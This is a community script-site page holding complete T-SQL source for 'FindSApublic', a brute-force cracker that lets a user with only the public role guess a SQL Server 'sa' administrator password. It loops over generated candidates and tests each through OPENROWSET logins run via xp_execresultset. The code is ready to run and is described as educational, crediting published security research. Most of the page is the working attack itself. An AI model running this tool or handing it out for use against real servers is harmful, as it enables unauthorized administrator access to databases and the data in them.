Click here to monitor SSC

<a href="//g.adspeed.net/ad.php?do=clk&zid=15220&wd=468&ht=60&pair=as" target="_blank"><img style="border:0px;" src="//g.adspeed.net/ad.php?do=img&zid=15220&wd=468&ht=60&pair=as" alt="i" width="468" height="60"/></a>

Log in :: Register :: Not logged in

Write for us

<a href="//g.adspeed.net/ad.php?do=clk&zid=15491&wd=120&ht=300&pair=as" target="_top"><img style="border:0px;" src="//g.adspeed.net/ad.php?do=img&zid=15491&wd=120&ht=300&pair=as" alt="i" width="120" height="300"/></a>

Get your favorite SSC scripts directly in SSMS with the free SQL Scripts addin. Search for scripts directly from SSMS, and instantly access any saved scripts in your SSC briefcase from the favorites tab.
Download now (direct download link)

Find SA password with public role-perm test DBA

By Joseph Gama, 2002/12/04

Find SA Password (Brute Force) with Public Role

FindSApublic is a brute-force password cracker that requires only public role.

Possibilities returns how many different passwords are possible with 1 up to c characters from a universe of n different characters.

Usage:

FindSApublic n

N is an integer which is the maximum length of the password to attempt cracking.

Acknowledgments
original idea:
David Litchfield
david@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you David, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/cracking-sql-passwords.pdf

original idea and code:
Chris Anley
chris@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you Chris, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/advanced_sql_injection.pdf

This code is provided as is and for educational purposes only.

Developed, adapted or translated to TSQL by Joseph Gama.

SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS OFF 
GO

CREATE function Possibilities (@c bigint, @n bigint)
--returns how many different passwords are possible with 1 up to c characters from a universe 
--of n different characters 
returns bigint
as
BEGIN
declare @i bigint, @result bigint
set @i=1
set @result=0
while @i<=@c
	BEGIN
	set @result=@result+power(@n,@i)
	set @i=@i+1
	END
RETURN @result
END

GO
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS ON 
GO

SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS OFF 
GO

CREATE PROCEDURE FindSApublic (@size int)
 AS
SET NOCOUNT ON
DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50), @dtime datetime, @s VARCHAR(10), @t VARCHAR(10)
SET @dtime=getdate()
SET @keys='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_'
SET @max=test.dbo.Possibilities( @size, LEN(@keys))
SET @n=len(@keys)
SET @s='A'
SET @i=0
create table ##temppwd (pwd  NVARCHAR(10))
WHILE @i<@max
	BEGIN
	SET @j=@i
	WHILE (@j>0)
		BEGIN
		SET @temp=@j % (@n)-sign(len(@s))
		if @temp<0 set @temp=@n-1
		SET @j=@j /(@n+sign(len(@s)))
		SET @s=substring(@keys,@temp+1,1)+@s
		SET @t=@s
		END
print @s
declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s)
--set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' FROM OPENDATASOURCE(''''SQLOLEDB'''',''''Data Source='+@@SERVERNAME+N';User ID=sa;Password='+@s1+N''''').master.dbo.sysobjects '''
set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid=sa;pwd='+@s1+N''''',''''select 1 '''')'''
exec master..xp_execresultset  @query,N'master'

if EXISTS(select * from ##temppwd)
	GOTO lblFound
	SET @s=''
	SET @i=@i+1
	END
drop table ##temppwd
select 'Not found after '+str(@max)+' rounds, up to '+@t+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
lblFound:
drop table ##temppwd
select 'Found: '+@s+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
GO
SET QUOTED_IDENTIFIER OFF 
GO
SET ANSI_NULLS ON 
GO

Total article views: 941 | Views in the last 30 days: 1

Related Articles

ARTICLE

How Safe are Your Passwords?

2007/10/02

How safe are your SQL passwords? Use these free tools to find out how secure your passwords are and ...

FORUM

Passwords

2010/11/07

Storing passwords securely

FORUM

password issues

2008/06/12

password issues

FORUM

Password change

2011/02/24

Password change

FORUM

password polacy

2009/08/10

password polacy

Contribute